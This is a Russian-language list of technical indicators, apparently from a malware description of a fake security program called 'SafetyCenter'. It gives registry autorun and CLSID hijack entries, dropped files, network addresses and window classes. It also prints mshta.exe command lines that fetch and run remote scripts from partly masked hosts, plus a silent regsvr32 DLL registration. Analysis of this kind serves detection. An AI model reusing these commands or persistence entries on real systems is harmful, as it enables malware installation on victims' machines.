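Техническая информация

Ниже без подзаголовков перечислены разнородные артефакты: значения реестра, командные строки процессов, имена процессов, пути к файлам, сетевые адреса и запросы, классы и заголовки окон. Подзаголовки разделов, по-видимому, утрачены, поэтому по самому списку нельзя определить, какое действие относится к каждому элементу (например, создаётся файл или удаляется). Символы «#» в доменном имени, IP-адресе и параметрах URL, судя по всему, заменяют часть значения, так что в приведённом виде эти индикаторы не годятся для точного сопоставления.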
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'SafetyCenter' = '%PROGRAM_FILES%\SafetyCenter\start.exe'
- [<HKLM>\SOFTWARE\Classes\CLSID\{25ecc7c8-331f-4758-8371-1d34c1e6a983}\Shell\Open\Command] '' = '%PROGRAM_FILES%\SafetyCenter\protector.exe'
- '%TEMP%\~1.exe'
- '<SYSTEM32>\mshta.exe' http://ur###nam.net/8732489273.php
- '<SYSTEM32>\regsvr32.exe' /s 1.dll
- '<SYSTEM32>\mshta.exe' http://95.##1.27.154/install.php?id######
- ICQ.exe
- firefox.exe
- %PROGRAM_FILES%\SafetyCenter\uninstall.exe
- %PROGRAM_FILES%\SafetyCenter\new.exe
- <Текущая директория>\1.dll
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\8732489273[1].php
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\install[1].php
- %PROGRAM_FILES%\SafetyCenter\sound.wav
- %TEMP%\~1.exe
- %PROGRAM_FILES%\SafetyCenter\main.ico
- %PROGRAM_FILES%\SafetyCenter\start.exe
- %PROGRAM_FILES%\SafetyCenter\protector.exe
- 'localhost':1039
- 'ur###nam.net':80
- 'localhost':1037
- '95.##1.27.154':80
- ur###nam.net/8732489273.php
- 95.##1.27.154/install.php?id######
- DNS ASK ur###nam.net
- ClassName: 'EDIT' WindowName: '(null)'
- ClassName: 'MS_WINHELP' WindowName: '(null)'
- ClassName: 'TForm1' WindowName: 'Safety Center'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'